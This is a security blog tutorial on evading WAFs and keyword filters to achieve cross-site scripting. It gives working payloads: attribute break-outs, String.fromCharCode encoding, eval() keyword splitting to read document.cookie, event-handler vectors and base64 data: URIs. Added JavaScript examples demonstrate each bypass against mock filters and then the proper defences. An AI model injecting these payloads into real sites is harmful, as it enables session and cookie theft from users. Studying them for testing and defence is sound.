      How to Bypass Web Application Firewall to Execute Cross Site Scripting

      • Posted by CiuLabs
      • Categories Blog, Ethical Hacking
      • Date January 11, 2022

      Because awareness of Cross-Site Scripting (XSS) among developers is now widespread, many deployments place a web application firewall (WAF) in front of the application. The WAF inspects user input, sanitizes or blocks whatever matches its rules, and passes the rest on to the server.

      So in the present-day scenario, knowledge of Cross-Site Scripting alone is not enough; knowing how WAFs and filters are bypassed (evaded) is just as crucial.

      Here are some of the ways in which one can bypass most web application firewalls.

      Firewalls have their rules defined, and they look for "certain" keywords while checking the input. Of course they will block the script tag, but if the match is case-sensitive, a change of capitalization bypasses it, e.g. sCrIpt. The browser's HTML parser treats tag names case-insensitively, so <sCrIpt> executes exactly like <script>.

      Consider a web page that has a text box built from an input tag, with the code

      <input type="text" name="input" value="">

      where the user-supplied string is reflected into the value attribute. We first need to jump out of the attribute and the input tag to get our code executed. To do that we close the attribute with a double quote, close the input tag with a closing angle bracket, and then write our script tag.

      Here is one example, with our string as "><script>alert("xss")</script>

      The resulting HTML is

      <input type="text" name="input" value=""><script>alert("xss")</script>">

      The browser sees an empty value attribute, a closed input tag, our script element, and a stray "> that it simply renders as text.

      Where the web masters have used PHP's addslashes() to protect against common web application attacks, every quote in our input gets a backslash in front of it, so alert("xss") arrives as alert(\"xss\") and is a JavaScript syntax error. addslashes() does nothing about the attribute break-out itself, because a backslash has no meaning to the HTML parser: \"> still closes the attribute and the tag. What we need is a payload whose JavaScript contains no quotes at all, so we convert the text into ASCII codes and rebuild it with String.fromCharCode().

      Converting XSS to ASCII, we have its value as 88,83,83. So our final query would be

      "><script>alert(String.fromCharCode(88,83,83))</script>
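      The break-out and the addslashes() problem above, as an added example that is not part of the original post. The server template, the JavaScript re-implementation of PHP's addslashes(), the payload strings and the escapeHtmlAttr() fix are all constructed here for illustration; toFromCharCode() generalizes the 88,83,83 step to any string.

```javascript
// Added example (not from the original post). Shows how a payload escapes a
// double-quoted value attribute, why addslashes()-style quote escaping does not
// stop it, and what the correct server-side fix looks like. Template, filter,
// payloads and fix are constructed here for illustration.

// Server template as described in the post: user input lands inside value="...".
function renderVulnerable(userInput) {
  return `<input type="text" name="input" value="${userInput}">`;
}

// PHP addslashes() behaviour reproduced in JS: backslash-escape ' " \ and NUL.
function addslashes(s) {
  return s.replace(/[\\'"\0]/g, (c) => '\\' + c);
}

// Encode an arbitrary string as a String.fromCharCode(...) expression so the
// payload carries no quote characters at all.
// toFromCharCode('XSS') -> 'String.fromCharCode(88,83,83)'
function toFromCharCode(s) {
  const codes = Array.from(s, (ch) => ch.charCodeAt(0));
  return `String.fromCharCode(${codes.join(',')})`;
}

// Correct defence: HTML-attribute-encode every character that can terminate
// the attribute or open a tag, instead of blacklisting keywords.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(userInput) {
  return `<input type="text" name="input" value="${escapeHtmlAttr(userInput)}">`;
}

// Heuristic check used below: did a literal <script> start tag reach the markup?
function containsScriptTag(html) {
  return /<script>/i.test(html);
}

const payload = '"><script>alert("xss")</script>';
const payloadNoQuotes = `"><script>alert(${toFromCharCode('XSS')})</script>`;

// 1. No filtering: the leading "> closes value="" and the input tag; the script follows.
console.log(renderVulnerable(payload));

// 2. addslashes(): alert("xss") becomes alert(\"xss\"), a SyntaxError in the
//    browser, but \"> still closes the attribute because a backslash means
//    nothing to the HTML parser. The tag lands, the script fails to parse.
console.log(renderVulnerable(addslashes(payload)));

// 3. addslashes() against the fromCharCode form: nothing inside alert() to
//    escape, so the injected script runs as written.
console.log(renderVulnerable(addslashes(payloadNoQuotes)));

// 4. Attribute encoding: the quote becomes &quot; and stays inside the attribute.
console.log(renderSafe(payload));
```

Run it with node and compare the four lines of output: only the fourth keeps the input inside the attribute. The point is that addslashes() was designed for SQL-style string literals; the fix for HTML is encoding for the HTML attribute context, not escaping quotes with backslashes.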

      While conducting penetration tests for some of my clients, I noticed that, since they needed users to enter HTML on their website, they tried to prevent XSS attacks by stripping out specific words that are commonly used in XSS payloads. The words filtered were document, cookie, onmouseover and so on.

      So I needed a workaround to get the users' cookies and perform the other operations. On further investigation I found that they had forgotten to block one important keyword in JavaScript: eval.

      eval() in JavaScript evaluates a string as code. Because the filter only matched complete keywords, I could split them into fragments that individually match nothing and let eval() join them at runtime. So I wrote up a simple query:

      var a = eval('documen'+'t.cooki'+'e');

      and then set up a cookie logger to send the variable a to me.

      Blocking "script" tags seems like a possible solution to XSS attacks, but it isn't. There are a lot of other triggers in JavaScript and HTML which can be used, such as event handler attributes on the BODY and IMG tags.

      <img src=javascript:alert("XSS") />

      Note that this javascript: form in an img src only worked in very old browsers; current browsers refuse to run script from an image URL. The event handler form works everywhere:

      <img src="xyz.png" onerror=alert("XSS")>

      Since there is no image named xyz.png, loading it fails, the onerror event handler fires, and the payload executes.

      <BODY onload=prompt("XSS")> : as soon as the BODY of the HTML page has loaded, our XSS is executed.
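      The keyword deny-list from the client engagement above, together with the case-variation and event-handler vectors, as an added example that is not part of the original post. The filter, the fake document object and the payload list are constructed here; runAsPage() is a stand-in for the browser so the eval() result can be inspected offline in Node.

```javascript
// Added example (not from the original post). A keyword deny-list of the kind
// described above and the three classes of payload that slip past it: case
// variation, string concatenation resolved by eval(), and event handlers on
// non-script tags. Filter, fake document and payloads are constructed here.

// Deny-list as described: strip words commonly seen in XSS payloads. Two
// weaknesses are deliberate because they are typical of such filters: the
// match is case-sensitive and it only recognises whole keywords.
const BLOCKED = ['script', 'document', 'cookie', 'onmouseover'];

function stripKeywords(input) {
  let out = input;
  for (const word of BLOCKED) out = out.split(word).join('');
  return out;
}

// Case variation: "sCrIpt" is not "script" to a case-sensitive filter, but the
// HTML parser treats tag names case-insensitively.
const caseVariant = '<sCrIpt>alert(1)</sCrIpt>';

// Concatenation: no single fragment is a blocked word, but eval() joins them at
// runtime into document.cookie. "return a" stands in for the cookie logger.
const evalPayload = "var a = eval('documen'+'t.cooki'+'e'); return a;";

// Stand-in for the browser: run the code with a "document" parameter in scope.
// Direct eval inside the generated function sees that parameter.
function runAsPage(code, fakeDocument) {
  return new Function('document', code)(fakeDocument);
}

// Event handlers: no <script> element anywhere in the payload.
const eventPayloads = [
  '<img src="xyz.png" onerror=alert("XSS")>',
  '<BODY onload=prompt("XSS")>',
];

// Payloads the filter passes through unchanged, i.e. offered no protection.
function survivors(payloads) {
  return payloads.filter((p) => stripKeywords(p) === p);
}

const fakeDocument = { cookie: 'session=abc123' }; // constructed value
const filtered = stripKeywords(evalPayload);
console.log('after filter :', filtered);                         // unchanged
console.log('eval result  :', runAsPage(filtered, fakeDocument)); // session=abc123
console.log('survivors    :', survivors([caseVariant, ...eventPayloads]));
console.log('naive payload:', stripKeywords('<script>alert(document.cookie)</script>'));
```

The last line shows the filter "working" on the textbook payload, which is exactly why such filters get deployed: they stop the obvious case and nothing else. When HTML input is genuinely required, an allow-list sanitizer that parses the markup and keeps only known-safe elements and attributes is the defence; a keyword deny-list cannot be patched into one.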

      Filters can also be bypassed by using Data URIs. A Data URI, defined by RFC 2397, is a way of embedding small files inline in HTML documents. Instead of linking to a file stored on the server, the file is provided within the URL itself as a base64-encoded string preceded by a MIME type, for example as the data of an object tag or the src of an iframe. A keyword filter that inspects only the raw request sees no <script> at all. One caveat: modern browsers give a data: document its own opaque origin, so script inside it cannot read the cookies or DOM of the page that embeds it; the vector still defeats filters and injects content, but it is not by itself a cookie theft.

      Syntax : data:[mediatype][;base64],data

      You can use any Base64 encoder, for example the online converter at http://www.opinionatedgeek.com/dotnet/tools/base64encode/, to convert your XSS query to Base64.

      For example, say you have an attack vector : "><script>alert("xss")</script>

      The resulting Base64 string for this would be

      Ij48c2NyaXB0PmFsZXJ0KCJ4c3MiKTwvc2NyaXB0Pg==
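      The Data URI construction above, and the matching defensive check, as an added example that is not part of the original post. toBase64()/dataUri() reproduce the encoding step (the Base64 value is the one quoted above); looksDangerous() and looksDangerousDeep() are constructed filter functions that show why an inspector has to decode data: URIs before looking for keywords. Only base64 data: URIs are handled; percent-encoded plain data is out of scope here.

```javascript
// Added example (not from the original post). Builds the RFC 2397 data: URI
// for a payload and contrasts a filter that inspects only the raw string with
// one that decodes embedded base64 first. Payload and filters are constructed.

// RFC 2397 form: data:[<mediatype>][;base64],<data>
function toBase64(s) {
  return Buffer.from(s, 'utf8').toString('base64');
}

function fromBase64(b64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

function dataUri(mediaType, payload) {
  return `data:${mediaType};base64,${toBase64(payload)}`;
}

// Naive inspection: keyword/pattern match on the raw string only.
function looksDangerous(s) {
  return /<script|javascript:|on\w+\s*=/i.test(s);
}

// Inspection that first expands every base64 data: URI it finds and checks the
// decoded content as well as the wrapper. Non-base64 bodies are checked as-is.
const DATA_URI_RE = /data:([^;,]*)(;base64)?,([A-Za-z0-9+/=]+)/gi;

function looksDangerousDeep(s) {
  if (looksDangerous(s)) return true;
  for (const m of s.matchAll(DATA_URI_RE)) {
    const isB64 = m[2] !== undefined;
    const body = m[3];
    const decoded = isB64 ? fromBase64(body) : body;
    if (looksDangerous(decoded)) return true;
  }
  return false;
}

const payload = '"><script>alert("xss")</script>';
const uri = dataUri('text/html', payload);

console.log(toBase64(payload)); // Ij48c2NyaXB0PmFsZXJ0KCJ4c3MiKTwvc2NyaXB0Pg==
console.log(uri);
console.log('raw check  :', looksDangerous(uri));     // false: nothing visible to match
console.log('deep check :', looksDangerousDeep(uri)); // true: decoded body has <script>
```

The decoding step is the whole lesson for the defender: a WAF or sanitizer that does not normalise encodings (base64 here, but equally URL encoding, HTML entities and Unicode escapes) before matching is matching the wrong bytes.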

      So there are no hard and fast rules for evading filters. One has to think, work by trial and error, and review the code to see the possibilities. The corresponding lesson for defenders is that keyword deny-lists do not hold up; encoding output for the context it lands in, and an allow-list sanitizer where HTML input is genuinely required, do.

